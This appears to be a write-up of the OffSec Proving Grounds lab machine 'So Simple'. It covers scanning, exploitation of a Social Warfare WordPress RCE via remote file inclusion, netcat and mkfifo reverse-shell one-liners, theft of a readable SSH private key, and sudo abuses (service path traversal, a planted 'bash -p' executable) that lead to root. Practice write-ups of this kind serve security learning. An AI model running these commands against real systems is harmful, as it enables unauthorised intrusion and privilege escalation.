
OffSec PG - So Simple


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel


PortServiceOther details (if any)
22SSHOpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.41 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • icons/ (403)
  • wordpress/
  • server-status/ (403)

Repeating a scan for the /wordpress/ subdirectory, the following were listed →

  • index.php (301)
  • wp-content/
  • wp-login.php
  • license.txt
  • wp-includes/
  • readme.html
  • wp-trackback.php
  • wp-admin (302, to wp-login.php)

WPScan was also run given the presence of the wordpress site. This revealed the following findings →

  • Plugin Social Warfare 3.5.0 (out of date)
  • Plugin Simple Cart Solution 0.2.0 (out of date)
  • Theme twentynineteen 1.6 (out of date)
  • Wordpress version 5.4.2
  • Enabled WP-Cron at /wordpress/wp-cron.php
  • Directory listing at /wordpress/wp-content/uploads/
  • XMLRPC enabled at /xmlrpc.php



With all the information above, the first searchsploit result is that of an RCE in Social Warfare versions < 3.5.3. Looking at the exploit, it needs a payload url to know the payload (an RFI). This will be included in /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=<RFI_URL>.

Reverse Shell

Visiting this page would give the result of the command in the payload url. The payload must be of the form → <pre>system('whoami')</pre>. Checking the existence of netcat and bash, a new payload can be used for a reverse shell → nc -e /bin/bash 3002. This didn’t work, therefore, used the usual bash payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 3002 >/tmp/f. This grants the shell as www-data user.

Privilege Escalation

User 1

Looking at /etc/passwd, the users of interest are root, max and steven. The home directory of both max and steven are readable by www-data. The user flag is in max’s home directory. The webroot also contains a base32 encoded string in a file mybackup.txtJEQGQYLWMUQHI3ZANNSWK4BAORUGS4ZAOBQXG43XN5ZGIIDTN5WWK53IMVZGKIDTMFTGK3DZEBRGKY3BOVZWKICJEBRWC3RHOQQHEZLNMVWWEZLSEBUXIORAN5YGK3TTMVZWC3LF.

This decodes to I have to keep this password somewhere safely because I can't remember it: opensesame. Therefore, this password is attempted on ssh for max and steven. However, this did not work.

The home directory of max also has a .ssh directory, which contains the private key of max. This is readable by www-data and is thus used to ssh into the server as max, which grants the shell and thus the user flag as well.

User 2

Checked the ability of max to run sudo using sudo -l. This allowed running /usr/sbin/service as steven without a password. The service command looks for services in a specific directory and launches them. It can therefore be tricked by prepending ../../../../ to whichever command needs to be executed. Therefore running →

sudo -u steven /usr/sbin/service ../../../../bin/bash

grants the shell as steven.


Looked at the ability of steven to run sudo. This revealed that steven is allowed to run /opt/tools/ as root without a password. The path does not exist, therefore, a new executable is created with the same name and the following content →

bash -p

Then command sudo /opt/tools/ is executed, which grants the shell as root and also the root flag.

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